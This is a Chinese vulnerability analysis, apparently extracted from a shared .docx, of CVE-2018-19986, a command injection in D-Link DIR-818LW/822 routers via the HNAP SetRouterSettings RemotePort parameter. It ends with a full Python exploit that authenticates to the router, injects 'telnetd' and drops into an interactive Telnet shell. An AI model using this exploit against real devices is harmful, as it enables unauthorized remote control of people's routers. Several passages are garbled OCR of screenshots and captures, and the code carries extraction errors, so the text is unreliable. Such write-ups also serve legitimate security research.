《(CVE-2018-19986)D-Link DIR-818LW&828命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-19986)D-Link DIR-818LW&828命令注入漏洞.docx(11页珍藏版)》请在三一办公上搜索。
1、(CVE-2018-19986) D-Link DIR-818LW&828 命令注入漏洞一、漏洞简介D-LinkDIR-822和D-LinkDlR-818LW都是中国台湾友讯(D-Link)公司的一款无 线路由器。D-Link DIR-818LW Rev.A 2.05.B03 和 DIR-822 Bl 202KRb06 中的 RemOtePOM参数存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过 程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法 命令。二、漏洞影响D-Link DIR-818LW Rev.A 2.05.B03DIR-822 Bl 202KRb06
2、三、复现过程漏洞分析原理D-Link DIR-818LW Rev.A 2.05.B03 和 DIR-822 Bl 202KRb06 中,通过 HNAPl 协 议访问SetROUterSettingS时,RemOtePOrt参数存在操作系统命令注入漏洞。在 SetROllterSettings.php源码中,RemOtPOrt参数没有经过任何检查,直接存放于 $path_inf_wanl.web,并且在 iptwan.php 中的 IPTWAN_build_command 函数 中使用$Path_inf_wanl.7web变量作为iptables的参数,同样未做检查。构造 SetRouterSe
3、ttings.Xml,使 RemotePort 中包含如 telnetd 的 shell 命令,利用该 漏洞执行非法操作系统命令。./etc/templates/hnap/SetRouterSettings.php:$path_inf_wanl = XNODE_getpathbytarget(, “inf,,uid, $WAN1, 0);#$WAN1 = WAN-1;$nodebase=/runtime/hnap/SetRouterSettings/;JremotePort = query($nodebase.RemotePort);set($path_inf_wanl.web, Jremot
4、ePort);./etc/services/IPTABLES/iptwan.phpfunction IPTWAN_build_command($name)$path = XNODE2getpathbytarget(,i inf, ,uid, $name, 0);$web = query ($path./web);#web 作为 iptables 的参数写入$_GLOBALS“START” if (query($path.7inbfilter) !=,)$inbfn = cut (query ($path. ,inbf ilter), 1, $hostip = query($path.webal
5、lowhostv4ip);if ($hostip !=,) if (query ($path. ,inbfilter) !=) fwrite( a$_GLOBALSSTARfwrite(, : ,y 布(E M) . t 27(M7). M5H Rrot Tirawrer Rrocml HnX Kr Server SfYrMn Dt: frl, )1 0c ItM 2,3:“ 9rtf TrEoco0ing: CM-Z Cetnt-ty*: tatal; c*aryt tmiM *Mrku* Languaye* 7aivc tln,2.*0MW9=utf-t*Mp: EnVeIoPeZMto.
6、tfS.M2lVliMa lmCMaIaUS: x9FW/mmw. 9. org2W ITlMLScMm.ml*vM*M9*chMM. ml.0rfMMMX*9*发送方收到之后,login的action由request变成了 login,即发送用户名密码的过 程,密码是由用户私钥处理过的数据。1,C*trl rtcL rc ort: M7f. (M Agrt: N. tq: 1. Act. 1. I MtAcct*t-g tw. ruew AccF : M_w,n*f . 一/: 0-& X HI :0 . 一金 KNl石i6;0三6 二;;.wTJnTWr4* Met4J-rAlawMltS
7、S7.M (KNT. Hfe1卬 OtfBM.; H IvZJ W O br (l*4 Vll*)t MM4 Vyi C(5U (WlX IJTTTJ 4 J*t). 0t: :3:“,:1:3 (:InternMoc w W bye cap*vrd (4Y blt) m Iatefface (Mrw 4. $rc 1; IM t. Dt: It? IM 2 Trani” Snteu PCcol, Src Hrt: M Dt RKt: X X: W5. Act: R LOT: * 0 ly3 TO ErH (W /”): K(H) MSrvr o(: *r M toe m n m” m Trf
8、r inneing* ciw*e1/11ITlM tlM HMetj .N)TCM WCM*) fMlJM! WfrM J4l iMPtTWrMt. . Nm t cfUie4 r*p0Mtll tata: Itl toytt .RtElMt RirtUp LjRQMtl ”3WfSMR4t.aOnCMlJv*. Sf 6 A wep f vw1o9 im : uy /-.sw*/2Mi/njcMM iMtMo 3f9f MNM S or fe: / VScMb *!.+:一*.:iMt :理解HNAP为了再深入理解HNAP,查看htdocsCgibin二进制文件,简化流程如下:hnap_ma
9、in()memset(acStackl708j0,0100);getenv(HTTP_AUTHORIZATION);soapaction = getenv(HTTP_SOAPACTION);request_method = getenv(REQUEST_METHOD);hnap_auth = getenv( ,HTTP_HNAP_AUTH,);cookie = get en v (, HTTP_COOKI E J;referer = getenv(HTTP-REFERER);memset (php_path,0,0x100);当未指定soapaction时,默认请求为GetDeviceSett
10、ingsif (soapaction = (char *)00) soapaction = else_si = strstr(soapactionj if (_si != (char *)0x0) parse-param-value(Var2jAction ,action);parse-param-value(uar2j Username,username);parse-param-value(Var2jLoginPassword,pwd);parse-param-value(uVar2jCaptcha, captcha);iVarl = strcmp(action?request);当 ac
11、tion 为 request 时if (iVarl = 0) 产生一个长度为0X32的随机字符串例:LVy04tz2fCRlZIu8vefr:LoCKU9qT0QaktWkw0hy3rNnQfhWaK Bget-random-string(random-stringj 0x32);COOkie_value为而十个字符例:LVy04tz2fCStrncpy(cookie_value,random-stringj10);/challenge为接下来20个字符7例:RlZIu8vefrlOCKu9qTOQStrncpy (random-challengej random_string_10,0x14
12、);/public key切妾下来20个字符例:aktWkwOhySrNnQfhWaKBStrnCPy(PUbliJkey, random_string_30,0x14);sprintf (public_key_and_0j %s%s public_key,0);strcpy (CKIEj cookie_value);Strcpy(CHALLENGE,random_challenge);HMAjMD5就是常见的HMAC, hash算法为MD5。这里函数的输出 放在第三个参数中例:hmac_l=E188583458DE427B6A71C2DD04CB632CHMAjMD5 (rand Om.ch
13、allenge, PUbIiJkey_and_0, hmac_l);/set challenge,privatekey,captcha返回 soap xml)end of action=request else(if(strcmp(actionjlogin)=0 & cookie !=0)find_uid = strstr(cookie, ,uid=);if (find_uid = (char *)0x0) goto LAB_004137fc;获取cookie的值strncpy(cookie_value4find_uid + 4,10);检查 cookie_fd=get-cgdata-by-u
14、id(acStackl904jcookie-value);if (_fd- devconsole; 一else _format = sh %s%s.sh devconsole 一执行该脚本/var_run变量对应的字符是varrunsnprintf(acStackl708j0100j_format,&var_run,operation); system(acStackl708);)漏洞执行顺序在上面的hnap.main代码中,代入本漏洞SetRouterSettings的情况,最后会执行 sh varrunSetRouterSettings.sh,这个脚本是动态生成的,在模拟固件并执行poc成
15、功之后查看内容(还没找到具体生成Sh脚本的代码)#!binshecho $0-RouterSettings Change devconsoleevent DBSAVE devconsoleservice HTTP.WAN-I start devconsole #here! ! !xmldbc -s runtimehnapdev-status , devconsoleHTTP.WAN-1 是一种服务,对应于etcservicesHTTP.WAN-l.php,该服务会开启IPT.WAN-1 服务etcserviceslPT.WAN-l.php 会执行之前所说的 iptables 命令漏洞复现imp
16、ort requestsimport telnetlibfrom hashlib import md5import timeimport mathtrans_5C = .join(chr(x 05c) for x in xrange(256)trans_36 = ,.join(chr(x A 0x36) for x in xrange(256)blocksize = md5().block_sizedef hmac-md5(keyj msg):if len(key) blocksize:key = md5(key).digest()key += chr() * (blocksize - len
17、(key)o_key_pad = key.translate(trans_5C)i_key_pad = key.translate(trans_36)return md5(o_key_pad + md5(i_key_pad + msg).digest()def HNAP_AUTH(SOAPAction, privateKey):b = math.floor(int(time.time() % 2000000000b = str(b):-2h = hmac_md5(privateKey, b + http:/HNAPl, + SO APAction + ,).hexdigest().upper(
18、)return h + + b#输入IP和admin 口令,通过读hnap_main的二进制,理解初始状态admin的口令为空 (PUbli Jkey_0: 0 代表空值)IP = 192.168.0.1admiPw =,command = ,telnetd # command injection idheaders = requests. utils. default_headers()headers User-Agent = Mozilla5.0 (Windows NT 10.0; Win64; 64) Appl eWebKit/537.36 (KHTML, like Gecko) Chr
19、ome/56.0.2924.76 Safari/537.36 headersSOAPAction = , headersOrigin = http:/n + IPheadersReferer = http:/ +IP + infoLogin.htmlheadersnContent-Type = ,textxml; Charset=UTF-8 headersX-Requested-With = nXMLHttpRequestn#构造一个action为request的请求发送给Loginpayload = soap:BodyxLogin xmlns= questAdmin r = requests
20、.post(httpz,+IP+,HNAPl, headers=headers data=payload) data = r.text#通过获取的publickey计算privatekey,根据privatekey计算口令的hmac(在上文 中对应的是hmac_l)challenge = str(datadata.find() + 11: data.find(n)cookie = data data .find (,) + 8: data.find(,)publicKey = str (data data. find(,) + 11: data .find (,n)privateKey = h
21、mac_md5(publicKey + adminPw, challenge).hexdigest().upper Opassword = hmac_md5(privateKey, challenge).hexdigest().upper()#构造action为IOgin的请求,发送用户名和口令headersHNAP-ATH = HNAP_AUTH(Login, privateKey)headers Cookie = uid= + cookiepayload = ,lo ginAdmin+password+,r = requests.post(http:/+IP+HNAP1,i headers
22、=headersj data=payload)#登录成功后访问SetRouterSettings设置路由器的一些配置,其中RemotePort被设 置为 commandheaders Origin = http: /, + IPheadersHNAP_AUTH = HNAP_AUTH(SetRouterSettings, privateKey)headersSOAPaction = , gs,headersAccept = ,textmlpayload = open(,).xml,.format(CVE-2018-19986).read(). replace(ip, IP).replace(COMMAND, command) print ,* command injectionr = requests.post(http:/+IP+HNAP1,i headers=headersj data=payload) print(r.text)print ,* waiting 30 sec., time.sleep(30)#利用成功之后,服务端已经开启了 TeInet服务,攻击者可直接连服务器的Telnet print * enjoy your shell,telnetlib.Telnet(IP).interact(
